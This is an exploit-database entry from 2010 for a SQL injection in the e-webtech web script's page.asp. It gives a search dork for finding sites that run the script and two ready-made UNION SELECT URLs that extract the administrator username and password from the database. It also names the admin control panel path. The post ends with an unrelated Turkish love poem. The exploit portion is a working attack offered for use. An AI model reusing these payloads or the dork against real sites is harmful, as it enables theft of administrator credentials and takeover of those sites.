e-webtech - 'page.asp' SQL Injection

EKU-ID: 19739	CVE:	OSVDB-ID:
Author: CoBRa_21	Published: 2010-05-11	Verified:
Download:
Rating

☆☆☆☆☆
-------------------------------------------------------------------------------------------

e-webtech (page.asp) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Name: e-webtech

Dork: "Powerd by www.e-webtech.com"

-------------------------------------------------------------------------------------------

User Exploit:

http://localhost/[path]/page.asp?id=1+union+select+0,1,username+from+adminpassword

Password Exploit:

http://localhost/[path]/page.asp?id=1+union+select+0,1,pwd+from+adminpassword

Administartor Panel:

http://localhost/[path]/controlpanel/

-------------------------------------------------------------------------------------------

Öyle bir özlemi&#351;im ki seni
Art&#305;k dönsen de olur dönmesen de
Ben her daim yine sana sitemli yine sana hasret giderim
Aziz yar sen bir sabah bu &#351;ehri ba&#351;&#305;ma y&#305;k&#305;p gittin
Da&#287;lar&#305; deviriverdin üstüme hiç çekinmedin
Ben bu &#351;ehirde bir daha da sabah görmedim
Günayd&#305;nlar olmad&#305; günler aymad&#305; sensiz ........

-------------------------------------------------------------------------------------------